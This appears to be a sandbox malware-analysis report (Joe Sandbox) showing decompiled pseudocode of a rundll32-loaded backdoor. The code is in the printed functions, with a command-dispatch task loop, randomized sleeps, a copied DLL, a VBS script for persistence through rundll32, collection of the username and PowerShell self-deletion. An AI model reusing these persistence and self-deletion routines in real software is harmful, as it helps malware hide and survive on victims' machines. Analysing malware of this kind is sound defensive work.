                                        				_t861 =  *((intOrPtr*)(_t818 - 0x28));
                                        				 *(_t818 + 8) = _t861;
                                        				 *(_t818 + 0x1d0) = _t861;
                                        				if (_t861 == 0) goto 0xf2fea0d1;
                                        				_t336 = E0000021E21EF2FEBCF0(_t608 >> 5 >> 0x3f, (_t608 >> 5) + (_t608 >> 5 >> 0x3f), _t861, ((_t608 >> 5) + (_t608 >> 5 >> 0x3f)) * 0x70 +  *((intOrPtr*)(_t818 - 0x30)), _t849);
                                        				goto 0xf2fea10a;
                                        				if (_t861 !=  *((intOrPtr*)(_t818 - 0x20))) goto 0xf2fea0ea;
                                        				E0000021E21EF2FEB0F0(_t336, _t818 - 0x30);
                                        				_t862 =  *((intOrPtr*)(_t818 - 0x28));
                                        				_t809 =  *((intOrPtr*)(_t818 - 0x30));
                                        				 *(_t818 + 0x1d0) = _t862;
                                        				 *(_t818 + 8) = _t862;
                                        				if (_t862 == 0) goto 0xf2fea10a;
                                        				_t338 = E0000021E21EF2FEBCF0(_t608 >> 5 >> 0x3f, (_t608 >> 5) + (_t608 >> 5 >> 0x3f), _t862, _t818 + 0x240, _t849);
                                        				_t863 = _t862 + 0x70;
                                        				 *((long long*)(_t818 - 0x28)) = _t863;
                                        				E0000021E21EF2FE6100(E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t338, _t421, _t818 + 0x288), _t421, _t818 + 0x268), _t421, _t818 + 0x240);
                                        				if (_t815 + 0x10 != _t866) goto 0xf2fe9d10;
                                        				r12d =  *((intOrPtr*)(_t818 + 0x5e0));
                                        				r13d = 3;
                                        				r15d = 0;
                                        				if (r12d != 1) goto 0xf2fea70b;
                                        				if (_t809 != _t863) goto 0xf2fea279;
                                        				r8d = E0000021E21EF3111C60(_t608 >> 5 >> 0x3f);
                                        				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                                        				r8d = r8d + 0x19;
                                        				_t423 = r8d * 0x3e8;
                                        				Sleep(??);
                                        				if ( *((intOrPtr*)(_t818 + 0xd8)) == 0) goto 0xf2fea1a7;
                                        				E0000021E21EF2FEB260(0x28c1979 * r8d, (_t608 >> 5) + (_t608 >> 5 >> 0x3f),  *((intOrPtr*)(_t818 + 0xd8)));
                                        				0xf3111fb0();
                                        				0xf310bdc8();
                                        				_t614 =  *((intOrPtr*)(_t818 - 0x78));
                                        				if (_t614 - 0x10 < 0) goto 0xf2fea218;
                                        				_t694 =  *((intOrPtr*)(_t819 + 0x70));
                                        				if (_t614 + 1 - _t809 < 0) goto 0xf2fea213;
                                        				if ((_t423 & 0x0000001f) != 0) goto 0xf2fea8bf;
                                        				_t616 =  *((intOrPtr*)(_t694 - 8));
                                        				if (_t616 - _t694 >= 0) goto 0xf2fea8b9;
                                        				_t695 = _t694 - _t616;
                                        				if (_t695 - 8 < 0) goto 0xf2fea8b3;
                                        				if (_t695 - 0x27 > 0) goto 0xf2fea8ad;
                                        				0xf310ba8c();
                                        				 *((long long*)(_t818 - 0x78)) = 0xf;
                                        				 *((long long*)(_t818 - 0x80)) = _t866;
                                        				 *((char*)(_t819 + 0x70)) = 0;
                                        				_t617 =  *((intOrPtr*)(_t818 - 0x38));
                                        				if (_t617 - 0x10 < 0) goto 0xf2fe98ee;
                                        				_t697 =  *((intOrPtr*)(_t818 - 0x50));
                                        				if (_t617 + 1 - _t809 < 0) goto 0xf2fe98e9;
                                        				if ((_t423 & 0x0000001f) != 0) goto 0xf2fea8d7;
                                        				_t619 =  *((intOrPtr*)(_t697 - 8));
                                        				if (_t619 - _t697 >= 0) goto 0xf2fea8d1;
                                        				_t698 = _t697 - _t619;
                                        				if (_t698 - 8 < 0) goto 0xf2fea8cb;
                                        				if (_t698 - 0x27 > 0) goto 0xf2fea8c5;
                                        				goto 0xf2fe98e6;
                                        				r12d = 1;
                                        				_t160 = _t818 + 0x10; // 0x13
                                        				E0000021E21EF2FE5D10(_t466, (_t608 >> 5) + (_t608 >> 5 >> 0x3f), _t160, _t809 + 0x28);
                                        				_t817 =  *((intOrPtr*)(_t809 + 0x18));
                                        				if (_t817 - 0x10 < 0) goto 0xf2fea29d;
                                        				goto 0xf2fea2a0;
                                        				_t648 =  *((intOrPtr*)(_t809 + 0x10));
                                        				_t833 =  <  ? _t648 : 0xffffffff;
                                        				_t511 =  <  ? _t648 : 0xffffffff;
                                        				if (( <  ? _t648 : 0xffffffff) == 0) goto 0xf2fea2c8;
                                        				if (E0000021E21EF310E7C0(_t423, _t809, "shi",  <  ? _t648 : 0xffffffff) != 0) goto 0xf2fea382;
                                        				if (_t648 != 3) goto 0xf2fea382;
                                        				r8d = 0x208;
                                        				E0000021E21EF310E410(_t423, 0, 0x1000, _t466, 0xf320b2a0, "shi", _t809,  <  ? _t648 : 0xffffffff);
                                        				E0000021E21EF3111C60(_t619);
                                        				r9d = 0;
                                        				_t169 = _t849 + 0x26; // 0x26
                                        				r8d = _t169;
                                        				__imp__SHGetSpecialFolderPathA();
                                        				lstrcatA(??, ??);
                                        				 *((long long*)(_t818 + 0x170)) = _t619;
                                        				 *((long long*)(_t818 + 0x178)) = _t619;
                                        				 *((long long*)(_t818 + 0x180)) = _t619;
                                        				E0000021E21EF3017F50(_t619, _t648, _t818 + 0x170, _t809, _t817, _t849);
                                        				if ( *((intOrPtr*)(_t818 + 0x180)) == 0) goto 0xf2fea2e0;
                                        				r13d = 3;
                                        				_t177 = _t818 + 0x10; // 0x13
                                        				E0000021E21EF2FE7390(_t619,  *((intOrPtr*)(_t818 + 0x170)),  *((intOrPtr*)(_t818 + 0x178)), _t177, 0xf31b0230);
                                        				goto 0xf2fea618;
                                        				if (_t817 - 0x10 < 0) goto 0xf2fea38d;
                                        				goto 0xf2fea390;
                                        				_t836 =  <  ? _t648 : 0xf31b0230;
                                        				_t517 =  <  ? _t648 : 0xf31b0230;
                                        				if (( <  ? _t648 : 0xf31b0230) == 0) goto 0xf2fea3b4;
                                        				if (E0000021E21EF310E7C0(0, _t809, "dij",  <  ? _t648 : 0xf31b0230) != 0) goto 0xf2fea46f;
                                        				if (_t648 != 3) goto 0xf2fea46f;
                                        				asm("o16 nop [eax+eax]");
                                        				r8d = 0x208;
                                        				E0000021E21EF310E410(0, 0, 0x1000, _t466, 0xf320b2a0, "dij", _t809,  <  ? _t648 : 0xf31b0230);
                                        				_t358 = E0000021E21EF3111C60(_t619);
                                        				r9d = 0;
                                        				_t186 = _t849 + 0x26; // 0x26
                                        				r8d = _t186;
                                        				__imp__SHGetSpecialFolderPathA();
                                        				lstrcatA(??, ??);
                                        				 *((long long*)(_t818 + 0x158)) = _t619;
                                        				 *((long long*)(_t818 + 0x160)) = _t619;
                                        				 *((long long*)(_t818 + 0x168)) = _t619;
                                        				E0000021E21EF3017F50(_t619, _t648, _t818 + 0x158, _t809, _t817, _t849);
                                        				if ( *((intOrPtr*)(_t818 + 0x168)) == 0) goto 0xf2fea3d0;
                                        				E0000021E21EF2FE7560(_t648,  *((intOrPtr*)(_t818 + 0x158)),  *((intOrPtr*)(_t818 + 0x160)), _t817, _t818, _t818 + 0x10, _t809 + 0x48);
                                        				goto 0xf2fea618;
                                        				if (_t817 - 0x10 < 0) goto 0xf2fea47a;
                                        				goto 0xf2fea47d;
                                        				_t839 =  <  ? _t648 : 0xf31b0230;
                                        				_t523 =  <  ? _t648 : 0xf31b0230;
                                        				if (( <  ? _t648 : 0xf31b0230) == 0) goto 0xf2fea49d;
                                        				if (E0000021E21EF310E7C0(0, _t809, "dex",  <  ? _t648 : 0xf31b0230) != 0) goto 0xf2fea504;
                                        				if (_t648 != 3) goto 0xf2fea504;
                                        				r9d = 0;
                                        				r8d = _t648 + 0x19;
                                        				__imp__SHGetSpecialFolderPathA();
                                        				lstrcatA(??, ??);
                                        				_t791 =  >=  ?  *((void*)(_t818 + 0x10)) : _t818 + 0x10;
                                        				r8d =  *(_t818 + 0x20);
                                        				if (E0000021E21EF301B91C(_t619, _t648, 0xf320b2a0,  >=  ?  *((void*)(_t818 + 0x10)) : _t818 + 0x10, _t817, _t809 + 0x48) == 0) goto 0xf2fea620;
                                        				0xf301c460();
                                        				goto 0xf2fea61c;
                                        				if (_t817 - 0x10 < 0) goto 0xf2fea50f;
                                        				goto 0xf2fea512;
                                        				_t841 =  <  ? _t648 : 0xf31b0230;
                                        				_t530 =  <  ? _t648 : 0xf31b0230;
                                        				if (( <  ? _t648 : 0xf31b0230) == 0) goto 0xf2fea537;
                                        				if (E0000021E21EF310E7C0(0, _t809, "sdl",  <  ? _t648 : 0xf31b0230) == 0) goto 0xf2fea537;
                                        				r15d = 0;
                                        				goto 0xf2fea552;
                                        				if (_t648 - 3 >= 0) goto 0xf2fea545;
                                        				r15d = 0;
                                        				goto 0xf2fea552;
                                        				r15d = 0;
                                        				if ((r15d & 0xffffff00 | _t648 - 0x00000003 > 0x00000000) == 0) goto 0xf2feaab5;
                                        				if (_t817 - 0x10 < 0) goto 0xf2fea565;
                                        				goto 0xf2fea568;
                                        				_t843 =  <  ? _t648 : 0xf31b0230;
                                        				_t537 =  <  ? _t648 : 0xf31b0230;
                                        				if (( <  ? _t648 : 0xf31b0230) == 0) goto 0xf2fea58c;
                                        				if (E0000021E21EF310E7C0(0, _t809, "ins",  <  ? _t648 : 0xf31b0230) != 0) goto 0xf2fea620;
                                        				if (_t648 - 3 >= 0) goto 0xf2fea597;
                                        				goto 0xf2fea5a1;
                                        				_t375 = r15d & 0xffffff00 | _t648 - 0x00000003 > 0x00000000;
                                        				if (_t375 != 0) goto 0xf2fea620;
                                        				if ( *((intOrPtr*)(_t818 + 0x5d8)) == _t375) goto 0xf2fea5e8;
                                        				r8d = E0000021E21EF3111C60(_t619);
                                        				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                                        				r8d = r8d + 0x19;
                                        				_t430 = r8d * 0x3e8;
                                        				Sleep(??);
                                        				E0000021E21EF2FE6100(0x28c1979 * r8d, _t430, _t818 + 0x10);
                                        				goto 0xf2fea681;
                                        				 *((char*)(_t819 + 0x20)) = 0;
                                        				_t380 = E0000021E21EF2FE76A0(0x28c1979 * r8d >> 0x20 >> 1, _t648, _t818 + 0x2b0, _t818 + 0x420, _t809, _t817, _t818 + 0x188, _t818 + 0x138, _t857);
                                        				if (_t380 != 0) goto 0xf2fea8dd;
                                        				goto 0xf2fea5ad;
                                        				if (_t380 == 0) goto 0xf2fea620;
                                        				 *((intOrPtr*)(_t809 + 0x68)) = r12d;
                                        				_t620 =  *((intOrPtr*)(_t818 + 0x28));
                                        				if (_t620 - 0x10 < 0) goto 0xf2fea66e;
                                        				_t721 =  *((intOrPtr*)(_t818 + 0x10));
                                        				if (_t620 + 1 - 0x1000 < 0) goto 0xf2fea669;
                                        				if ((_t430 & 0x0000001f) != 0) goto 0xf2feaaaf;
                                        				_t622 =  *((intOrPtr*)(_t721 - 8));
                                        				if (_t622 - _t721 >= 0) goto 0xf2feaaa9;
                                        				_t722 = _t721 - _t622;
                                        				if (_t722 - 8 < 0) goto 0xf2feaaa3;
                                        				if (_t722 - 0x27 > 0) goto 0xf2feaa9d;
                                        				0xf310ba8c();
                                        				 *((long long*)(_t818 + 0x28)) = 0xf;
                                        				r15d = 0;
                                        				 *(_t818 + 0x20) = 0xf31b0230;
                                        				 *((intOrPtr*)(_t818 + 0x10)) = r15b;
                                        				_t810 = _t809 + 0x70;
                                        				if (_t810 != _t863) goto 0xf2fea280;
                                        				r8d = E0000021E21EF3111C60(_t622);
                                        				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                                        				r8d = r8d + 0x19;
                                        				Sleep(??);
                                        				if ( *((intOrPtr*)(_t818 + 0xd8)) == 0) goto 0xf2fea6cd;
                                        				_t384 = E0000021E21EF2FEB260(0x28c1979 * r8d, _t648,  *((intOrPtr*)(_t818 + 0xd8)));
                                        				0xf3111fb0();
                                        				0xf310bdc8();
                                        				E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t384, r8d * 0x3e8, _t819 + 0x70), r8d * 0x3e8, _t818 - 0x50);
                                        				goto 0xf2fe9742;
                                        				r8d = E0000021E21EF3111C60(_t622);
                                        				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                                        				r8d = r8d + 0x19;
                                        				_t434 = r8d * 0x3e8;
                                        				Sleep(??);
                                        				if ( *((intOrPtr*)(_t818 + 0xd8)) == 0) goto 0xf2fea74a;
                                        				E0000021E21EF2FEB260(0x28c1979 * r8d, _t648,  *((intOrPtr*)(_t818 + 0xd8)));
                                        				0xf3111fb0();
                                        				0xf310bdc8();
                                        				_t623 =  *((intOrPtr*)(_t818 - 0x78));
                                        				if (_t623 - 0x10 < 0) goto 0xf2fea7bb;
                                        				_t732 =  *((intOrPtr*)(_t819 + 0x70));
                                        				if (_t623 + 1 - _t810 < 0) goto 0xf2fea7b6;
                                        				if ((_t434 & 0x0000001f) != 0) goto 0xf2feada7;
                                        				_t625 =  *((intOrPtr*)(_t732 - 8));
                                        				if (_t625 - _t732 >= 0) goto 0xf2feada1;
                                        				_t733 = _t732 - _t625;
                                        				if (_t733 - 8 < 0) goto 0xf2fead9b;
                                        				if (_t733 - 0x27 > 0) goto 0xf2fead95;
                                        				0xf310ba8c();
                                        				 *((long long*)(_t818 - 0x78)) = 0xf;
                                        				 *((long long*)(_t818 - 0x80)) = 0xf31b0230;
                                        				 *((char*)(_t819 + 0x70)) = 0;
                                        				_t626 =  *((intOrPtr*)(_t818 - 0x38));
                                        				if (_t626 - 0x10 < 0) goto 0xf2fe98ee;
                                        				_t735 =  *((intOrPtr*)(_t818 - 0x50));
                                        				if (_t626 + 1 - _t810 < 0) goto 0xf2fe98e9;
                                        				if ((_t434 & 0x0000001f) != 0) goto 0xf2feadbf;
                                        				_t628 =  *((intOrPtr*)(_t735 - 8));
                                        				if (_t628 - _t735 >= 0) goto 0xf2feadb9;
                                        				_t736 = _t735 - _t628;
                                        				if (_t736 - 8 < 0) goto 0xf2feadb3;
                                        				if (_t736 - 0x27 > 0) goto 0xf2feadad;
                                        				goto 0xf2fe98e6;
                                        				r8d = E0000021E21EF3111C60(_t628);
                                        				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
                                        				r8d = r8d + 0x19;
                                        				Sleep(??);
                                        				goto 0xf2fe9742;
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf3111be8();
                                        				asm("xorps xmm0, xmm0");
                                        				asm("movdqu [ebp+0x2f0], xmm0");
                                        				 *((long long*)(_t818 + 0x300)) = 0xf31b0230;
                                        				r13d =  ==  ? r12d : r13d;
                                        				 *((intOrPtr*)(_t810 + 0x68)) = r13d;
                                        				E0000021E21EF2FEAF10(0x28c1979 * r8d, _t648, _t818 + 0x2f0, _t810);
                                        				 *((long long*)(_t819 + 0x20)) = _t818 + 0x2f0;
                                        				0xf3014e20();
                                        				_t630 = _t818 + 0x50;
                                        				 *((long long*)(_t819 + 0x20)) = _t818 + 0x50;
                                        				E0000021E21EF2FE6100(E0000021E21EF2FF5CD0(_t358 - "dij" + "dij" * 2, r8d * 0x3e8, 0x28c1979 * r8d >> 0x20 >> 1, 0x1000, 0x28c1979 * r8d - 3, _t648, _t818 - 0x70, ( *0xf320b298 << 6) +  *((intOrPtr*)(_t818 + 0x120)), _t817, _t818, ( *0xf320b298 << 6) +  *((intOrPtr*)(_t818 + 0x120)) + 0x20, _t818 + 0x440), r8d * 0x3e8, _t818 - 0x70);
                                        				 *((long long*)(_t818 - 8)) = 0xf31b0230;
                                        				 *_t818 = 0xf31b0230;
                                        				 *_t818 = 0xf;
                                        				 *((long long*)(_t818 - 8)) = 0xf31b0230;
                                        				 *((char*)(_t818 - 0x18)) = 0;
                                        				r8d = 0;
                                        				E0000021E21EF2FE6530(_t648, _t818 - 0x18, _t818 + 0x138, _t810, _t817, ( *0xf320b298 << 6) +  *((intOrPtr*)(_t818 + 0x120)) + 0x20, _t818 + 0x00000440 | 0xffffffff);
                                        				 *((long long*)(_t819 + 0x60)) = 0xf31b0230;
                                        				 *((long long*)(_t819 + 0x68)) = 0xf31b0230;
                                        				 *((long long*)(_t819 + 0x68)) = 0xf;
                                        				 *((long long*)(_t819 + 0x60)) = 0xf31b0230;
                                        				 *((char*)(_t819 + 0x50)) = 0;
                                        				r8d = 0xa;
                                        				E0000021E21EF2FE6400(_t648, _t819 + 0x50, "powershell", _t817, ( *0xf320b298 << 6) +  *((intOrPtr*)(_t818 + 0x120)) + 0x20);
                                        				GetCurrentProcessId();
                                        				E0000021E21EF2FE9020(_t818 + 0x2d0);
                                        				E0000021E21EF2FEB660(_t818 + 0x50, _t818 - 0x70, _t818 + 0x50);
                                        				r8d = r8d ^ r8d;
                                        				E0000021E21EF2FE6100(E0000021E21EF2FE6100(E0000021E21EF2FE82C0(_t648, _t819 + 0x50, _t818 + 0x50, _t810, _t817, _t818, _t818 + 0x50, _t818 + 0x00000440 | 0xffffffffffffffff), r8d * 0x3e8, _t818 - 0x70), r8d * 0x3e8, _t818 + 0x2d0);
                                        				r8d = 0x15;
                                        				E0000021E21EF2FE8170(_t648, _t819 + 0x50, "; Remove-Item -Path \"", _t810, _t818, _t630);
                                        				r8d = 0;
                                        				E0000021E21EF2FE82C0(_t648, _t819 + 0x50, _t818 - 0x18, _t810, _t817, _t818, _t630, _t818 + 0x00000440 | 0xffffffffffffffff);
                                        				r8d = 8;
                                        				E0000021E21EF2FE8170(_t648, _t819 + 0x50, "\" -Force", _t810, _t818, _t630);
                                        				E0000021E21EF2FE8170(_t648, _t819 + 0x50, "\"", _t810, _t818, _t857);
                                        				_t753 =  >=  ?  *((void*)(_t819 + 0x50)) : _t819 + 0x50;
                                        				0xf301c460();
                                        				__imp__CoUninitialize();
                                        				ExitProcess(??);
                                        			}

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep
                                        • String ID: -Recurse"$" -Force$; Remove-Item -Path "$file_entry_point$powershell$response_status$task$task_data$task_id$tasks
                                        • API String ID: 3472027048-1893740589
                                        • Opcode ID: f4837e265cbb1a9a4bfda2367f8435db46ec640a00ba540cf5765c1bd5d03857
                                        • Instruction ID: 24e7a276f63b0ac655658a9f76501b577b5eeb70b6a4cebee40e2e3853fea275
                                        • Opcode Fuzzy Hash: f4837e265cbb1a9a4bfda2367f8435db46ec640a00ba540cf5765c1bd5d03857
                                        • Instruction Fuzzy Hash: 1D729C33221A8689EF61EF64DC583DA23A0F764758F420615DE5D5BF9ADF38C686C380
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 20%
                                        			E0000021E21EF2FE76A0(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, signed long long __r9, signed int __r12) {
                                        				void* __rbp;
                                        				void* __r14;
                                        				void* _t157;
                                        				signed char _t162;
                                        				void* _t164;
                                        				long _t172;
                                        				void* _t180;
                                        				void* _t184;
                                        				void* _t185;
                                        				void* _t186;
                                        				void* _t188;
                                        				int _t194;
                                        				void* _t196;
                                        				signed int _t208;
                                        				void* _t220;
                                        				void* _t221;
                                        				void* _t222;
                                        				void* _t268;
                                        				intOrPtr _t269;
                                        				intOrPtr _t271;
                                        				intOrPtr _t273;
                                        				long long _t274;
                                        				intOrPtr _t276;
                                        				intOrPtr _t278;
                                        				char* _t280;
                                        				intOrPtr _t290;
                                        				void* _t291;
                                        				void* _t295;
                                        				void* _t297;
                                        				void* _t334;
                                        				intOrPtr _t338;
                                        				void* _t339;
                                        				intOrPtr* _t374;
                                        				void* _t380;
                                        				void* _t383;
                                        				void* _t384;
                                        				void* _t385;
                                        				signed long long _t403;
                                        				signed long long _t404;
                                        				signed long long _t405;
                                        				void* _t412;
                                        				void* _t416;
                                        				void* _t417;
                                        
                                        				_t414 = __r12;
                                        				_t403 = __r9;
                                        				_t268 = _t384;
                                        				_t383 = _t268 - 0x698;
                                        				_t385 = _t384 - 0x780;
                                        				 *((long long*)(_t383 + 0x30)) = 0xfffffffe;
                                        				 *((long long*)(_t268 + 8)) = __rbx;
                                        				 *((long long*)(_t268 + 0x10)) = __rsi;
                                        				 *((long long*)(_t268 + 0x18)) = __rdi;
                                        				 *((long long*)(_t268 + 0x20)) = __r12;
                                        				_t374 = __r9;
                                        				_t380 = __r8;
                                        				_t417 = __rdx;
                                        				_t416 = __rcx;
                                        				asm("xorps xmm0, xmm0");
                                        				asm("movdqu [ebp+0x18], xmm0");
                                        				r12d = 0;
                                        				 *((long long*)(_t383 + 0x28)) = __r12;
                                        				 *((intOrPtr*)(_t385 + 0x40)) = r12b;
                                        				_t157 = E0000021E21EF2FE7D30(__rbx, _t383 + 0x18, _t385 + 0x40);
                                        				r9d = 0;
                                        				_t11 = _t414 + 0x23; // 0x23
                                        				r8d = _t11;
                                        				_t280 =  *((intOrPtr*)(_t383 + 0x18));
                                        				__imp__SHGetSpecialFolderPathA();
                                        				if (_t157 != 0) goto 0xf2fe771f;
                                        				goto 0xf2fe7cf8;
                                        				 *((long long*)(_t385 + 0x58)) = __r12;
                                        				 *((long long*)(_t385 + 0x60)) = __r12;
                                        				 *((long long*)(_t385 + 0x60)) = 0xf;
                                        				 *((long long*)(_t385 + 0x58)) = __r12;
                                        				 *((char*)(_t385 + 0x48)) = 0;
                                        				if ( *_t280 != 0) goto 0xf2fe7746;
                                        				goto 0xf2fe775a;
                                        				asm("o16 nop [eax+eax]");
                                        				if ( *((char*)(_t280 + (__r12 | 0xffffffff) + 1)) != 0) goto 0xf2fe7750;
                                        				E0000021E21EF2FE6400(_t280, _t385 + 0x48, _t280, __r8, (__r12 | 0xffffffff) + 1);
                                        				if ( *((long long*)(_t385 + 0x58)) != 0) goto 0xf2fe777a;
                                        				goto 0xf2fe7c8d;
                                        				E0000021E21EF2FE8950(_t280, _t385 + 0x68, "\\", _t380, _t383, _t416, _t403);
                                        				_t404 = _t403 | 0xffffffff;
                                        				r8d = r8d ^ r8d;
                                        				E0000021E21EF2FE82C0(_t280, _t385 + 0x48, _t268, _t374, _t380, _t383, _t416, _t404);
                                        				_t269 =  *((intOrPtr*)(_t383 - 0x80));
                                        				if (_t269 - 0x10 < 0) goto 0xf2fe77fb;
                                        				_t290 =  *((intOrPtr*)(_t385 + 0x68));
                                        				if (_t269 + 1 - 0x1000 < 0) goto 0xf2fe77f6;
                                        				if (0 == 0) goto 0xf2fe77c9;
                                        				0xf3111be8();
                                        				asm("int3");
                                        				_t271 =  *((intOrPtr*)(_t290 - 8));
                                        				if (_t271 - _t290 < 0) goto 0xf2fe77d8;
                                        				0xf3111be8();
                                        				asm("int3");
                                        				_t291 = _t290 - _t271;
                                        				if (_t291 - 8 >= 0) goto 0xf2fe77e7;
                                        				0xf3111be8();
                                        				asm("int3");
                                        				if (_t291 - 0x27 <= 0) goto 0xf2fe77f3;
                                        				0xf3111be8();
                                        				asm("int3");
                                        				0xf310ba8c();
                                        				 *((long long*)(_t383 - 0x80)) = 0xf;
                                        				 *((long long*)(_t385 + 0x78)) = __r12;
                                        				 *((char*)(_t385 + 0x68)) = 0;
                                        				if (_t380 == _t385 + 0x48) goto 0xf2fe782b;
                                        				_t405 = _t404 | 0xffffffff;
                                        				r8d = 0;
                                        				E0000021E21EF2FE6530(_t280, _t380, _t385 + 0x48, _t374, _t380, _t416, _t405);
                                        				if ( *((char*)(_t383 + 0x6c0)) == 0) goto 0xf2fe783e;
                                        				goto 0xf2fe7c8d;
                                        				_t295 =  >=  ?  *((void*)(_t385 + 0x48)) : _t385 + 0x48;
                                        				_t162 = GetFileAttributesA(??);
                                        				if (_t162 == 0xffffffff) goto 0xf2fe7866;
                                        				if ((_t162 & 0x00000010) == 0) goto 0xf2fe7866;
                                        				goto 0xf2fe7c8d;
                                        				_t297 =  >=  ?  *((void*)(_t385 + 0x48)) : _t385 + 0x48;
                                        				if (CreateDirectoryA(??, ??) != 0) goto 0xf2fe788b;
                                        				goto 0xf2fe7c8d;
                                        				_t164 = E0000021E21EF2FE8A10(_t385 + 0x48, _t280, _t385 + 0x68, _t385 + 0x48, _t380, _t405);
                                        				0xf2fe8b00();
                                        				E0000021E21EF2FE6100(_t164, 0, _t385 + 0x68);
                                        				r8d = 4;
                                        				E0000021E21EF2FE8170(_t280, _t383 - 8, ".dll", _t374, _t383, _t417);
                                        				r8d = 0x208;
                                        				E0000021E21EF310E410(0, 0, _t220, _t222, _t383 + 0x260, ".dll", _t374, _t417);
                                        				_t273 =  *((intOrPtr*)(_t374 + 0x10));
                                        				if (_t273 != 0) goto 0xf2fe790f;
                                        				r8d = 0x208;
                                        				E0000021E21EF310E410(0, 0, _t220, _t222, _t383 + 0x470, ".dll", _t374, _t417);
                                        				r8d = 0x208;
                                        				GetModuleFileNameA(??, ??, ??);
                                        				goto 0xf2fe7937;
                                        				_t281 =  <  ? _t273 : _t280;
                                        				if ( *((long long*)(_t374 + 0x18)) - 0x10 < 0) goto 0xf2fe7920;
                                        				if (( <  ? _t273 : _t280) == 0) goto 0xf2fe7937;
                                        				E0000021E21EF310DC90(0, _t220, _t221, _t222, _t383 + 0x260,  *_t374,  *_t374, _t380,  <  ? _t273 : _t280);
                                        				 *((long long*)(_t385 + 0x30)) = __r12;
                                        				 *((intOrPtr*)(_t385 + 0x28)) = 0x80;
                                        				 *((intOrPtr*)(_t385 + 0x20)) = 3;
                                        				r9d = 0;
                                        				_t58 = _t405 + 1; // 0x1
                                        				r8d = _t58;
                                        				CreateFileA(??, ??, ??, ??, ??, ??, ??);
                                        				_t381 = _t273;
                                        				if (_t273 == 0xffffffff) goto 0xf2fe7c7e;
                                        				_t172 = GetFileSize(??, ??);
                                        				r14d = _t172;
                                        				if (_t172 == 0) goto 0xf2fe79ed;
                                        				_t274 =  *0xf320b518;
                                        				if (_t274 != 0) goto 0xf2fe79b0;
                                        				GetProcessHeap();
                                        				 *0xf320b518 = _t274;
                                        				if (_t274 != 0) goto 0xf2fe79b0;
                                        				 *(_t385 + 0x44) = r12d;
                                        				goto 0xf2fe79ed;
                                        				HeapAlloc(??, ??, ??);
                                        				_t377 = _t274;
                                        				 *(_t385 + 0x44) = r12d;
                                        				if (_t274 == 0) goto 0xf2fe79ed;
                                        				 *((long long*)(_t385 + 0x20)) = __r12;
                                        				r8d = r14d;
                                        				ReadFile(??, ??, ??, ??, ??);
                                        				_t208 =  *(_t385 + 0x44);
                                        				CloseHandle(??);
                                        				if (_t274 == 0) goto 0xf2fe7c7e;
                                        				if (_t208 == 0) goto 0xf2fe7c7e;
                                        				_t311 =  >=  ?  *((void*)(_t383 - 8)) : _t383 - 8;
                                        				r8d = _t208;
                                        				E0000021E21EF301B91C(_t274,  <  ? _t273 : _t280,  >=  ?  *((void*)(_t383 - 8)) : _t383 - 8, _t274, _t273, _t385 + 0x44);
                                        				r8d = 0x200;
                                        				E0000021E21EF310E410(0, 0, _t220, _t222, _t383 + 0x60, _t274, _t274, _t416);
                                        				 *((intOrPtr*)(_t383 - 0x78)) = 0x100;
                                        				GetUserNameW(??, ??);
                                        				_t180 = E0000021E21EF2FE8A10(_t274,  <  ? _t273 : _t280, _t383 + 0x38, _t385 + 0x48, _t273, _t385 + 0x44);
                                        				0xf2fe8b00();
                                        				0xf2fe8a90();
                                        				E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t180, 0, _t385 + 0x68), 0, _t383 + 0x38);
                                        				 *(_t383 - 0x40) = __r12;
                                        				 *((long long*)(_t383 - 0x38)) = __r12;
                                        				 *((long long*)(_t383 - 0x38)) = 0xf;
                                        				 *(_t383 - 0x40) = __r12;
                                        				 *((char*)(_t383 - 0x50)) = 0;
                                        				r8d = 0x6b;
                                        				E0000021E21EF2FE6400( <  ? _t273 : _t280, _t383 - 0x50, "Set objShell = CreateObject(\"Wscript.Shell\")\r\nobjShell.Run \"rundll32.exe my_application_path, shjKeAQfgT\"\r\n", _t273, _t417);
                                        				 *((long long*)(_t383 - 0x60)) = __r12;
                                        				 *((long long*)(_t383 - 0x58)) = __r12;
                                        				 *((long long*)(_t383 - 0x58)) = 0xf;
                                        				 *((long long*)(_t383 - 0x60)) = __r12;
                                        				 *((char*)(_t383 - 0x70)) = 0;
                                        				r8d = 0x13;
                                        				_t184 = E0000021E21EF2FE6400( <  ? _t273 : _t280, _t383 - 0x70, "my_application_path", _t273, _t417);
                                        				_t363 =  >=  ?  *((void*)(_t383 - 0x70)) : _t383 - 0x70;
                                        				r8d = 0;
